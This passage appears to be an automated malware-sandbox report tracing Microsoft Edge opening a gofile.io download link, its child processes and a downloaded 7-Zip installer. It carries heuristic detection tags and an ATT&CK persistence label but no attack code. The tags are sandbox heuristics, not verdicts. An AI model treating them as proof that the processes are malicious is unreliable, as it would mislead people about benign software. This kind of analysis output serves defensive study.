PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/cGWbix
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc4c4b3cb8,0x7ffc4c4b3cc8,0x7ffc4c4b3cd8
2⤵
PID:1832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
2⤵
PID:3572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
2⤵
PID:4544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
2⤵
PID:992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
2⤵
PID:3956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
2⤵
PID:1868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
2⤵
PID:3288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
2⤵
PID:3284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
2⤵
PID:5080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
2⤵
PID:2888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
2⤵
PID:4784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1852

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
2⤵
PID:2832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
2⤵
PID:4604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
2⤵
PID:4540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
2⤵
PID:3736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
2⤵
PID:2492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
2⤵
PID:4696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
2⤵
PID:444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6500 /prefetch:8
2⤵
PID:2532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5788 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
2⤵
PID:748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
2⤵
PID:1220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7036 /prefetch:1
2⤵
PID:3104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6996 /prefetch:1
2⤵
PID:4364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1740 /prefetch:8
2⤵
PID:3992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1704 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:244

C:\Users\Admin\Downloads\7z2407-x64.exe
"C:\Users\Admin\Downloads\7z2407-x64.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
2⤵
PID:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7192 /prefetch:1
2⤵
PID:2240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7216 /prefetch:1
2⤵
PID:4548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7548 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6792 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4896 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:1
2⤵
PID:3716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
2⤵
PID:1592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
2⤵
PID:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7656 /prefetch:1
2⤵
PID:688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7728 /prefetch:1
2⤵
PID:4916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7748 /prefetch:1
2⤵
PID:4768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7644 /prefetch:1
2⤵
PID:336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7472 /prefetch:1
2⤵
PID:2704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7380 /prefetch:1
2⤵
PID:1500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
2⤵
PID:2696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7896 /prefetch:1
2⤵
PID:4200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7804 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8144 /prefetch:1
2⤵
PID:4484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8280 /prefetch:1
2⤵
PID:4376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8296 /prefetch:1
2⤵
PID:3712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8052 /prefetch:1
2⤵
PID:5592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8460 /prefetch:1
2⤵
PID:5608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8636 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
2⤵
PID:5900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8612 /prefetch:1
2⤵
PID:5320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8240 /prefetch:1
2⤵
PID:1996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7240 /prefetch:1
2⤵
PID:4996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
2⤵
PID:240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2448 /prefetch:1
2⤵
PID:1368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
2⤵
PID:5660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1828,9959157182140459754,1681649492758710400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8604 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2984

